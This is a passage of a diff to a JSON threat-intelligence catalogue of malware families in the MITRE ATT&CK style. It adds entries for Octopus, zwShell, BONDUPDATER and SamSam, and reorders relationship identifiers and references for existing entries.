"estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7917,14 +9337,14 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -7934,6 +9354,89 @@ "uuid": "53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2", "value": "NETEAGLE - S0034" }, + { + "description": "[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan.(Citation: Securelist Octopus Oct 2018)", + "meta": { + "external_id": "S0340", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0340", + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + ], + "synonyms": [ + "Octopus" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": 
"e2031fd5-02c2-43d4-85e2-b64f474530c2", + "value": "Octopus - S0340" + }, { "description": "[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)", "meta": { @@ -7965,14 +9468,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8029,21 +9532,7 @@ "type": "uses" }, { - "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8056,6 +9545,13 @@ ], "type": "uses" }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ 
@@ -8064,7 +9560,49 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8085,28 +9623,97 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "value": "SeaDuke - S0053" + }, + { + "description": "[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)", + "meta": { + "external_id": "S0350", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0350", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ], + "synonyms": [ + "zwShell" + ] + }, + "related": [ + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, 
+ { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8120,7 +9727,49 @@ "type": "uses" }, { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "54e8672d-5338-4ad1-954a-a7c986bee530", + "value": "zwShell - S0350" + }, + { + "description": "[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)", + "meta": { + "external_id": "S0360", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0360", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + ], + "synonyms": [ + "BONDUPDATER" + ] + }, + "related": [ + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8132,10 +9781,24 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], - "uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", - "value": "SeaDuke - S0053" + "uuid": "d5268dfb-ae2b-4e0e-ac07-02a460613d8a", + "value": "BONDUPDATER - S0360" }, { "description": "[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)", @@ -8160,6 +9823,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ @@ -8174,13 +9844,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -8232,6 +9895,13 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ 
@@ -8239,20 +9909,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -8261,7 +9917,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8297,20 +9960,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ @@ -8318,6 +9967,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ @@ -8331,6 +9987,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", 
@@ -8364,6 +10027,65 @@ "uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", "value": "ASPXSpy - S0073" }, + { + "description": "[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)", + "meta": { + "external_id": "S0370", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0370", + "https://www.us-cert.gov/ncas/alerts/AA18-337A", + "https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf", + "https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks" + ], + "synonyms": [ + "SamSam", + "Samas" + ] + }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "4d56e6e9-1a6d-46e3-896c-dfdf3cc96e62", + "value": "SamSam - S0370" + }, { "description": 
"[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)", "meta": { @@ -8394,34 +10116,6 @@ ], "type": "uses" }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ @@ -8430,21 +10124,7 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8458,7 +10138,28 @@ "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8471,6 +10172,27 @@ ], "type": "uses" }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ 
@@ -8492,34 +10214,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ @@ -8527,6 +10221,27 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -8535,7 +10250,21 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8575,48 +10304,6 @@ ], "type": "uses" }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -8632,7 +10319,35 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8645,12 +10360,26 @@ ], "type": "uses" }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", @@ -8680,13 +10409,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ @@ -8707,6 +10429,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "f6ac21b6-2592-400c-8472-10d0e2f1bfaf", @@ -8725,10 +10454,13 @@ "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/" ], "synonyms": [ "JHUHUGIT", + "Trojan.Sofacy", "Seduploader", "JKEYSKW", "Sednit", 
@@ -8779,6 +10511,13 @@ ], "type": "uses" }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -8786,27 +10525,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -8815,42 +10533,7 @@ "type": "uses" }, { - "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8864,7 +10547,70 @@ "type": "uses" }, { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8885,7 +10631,7 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
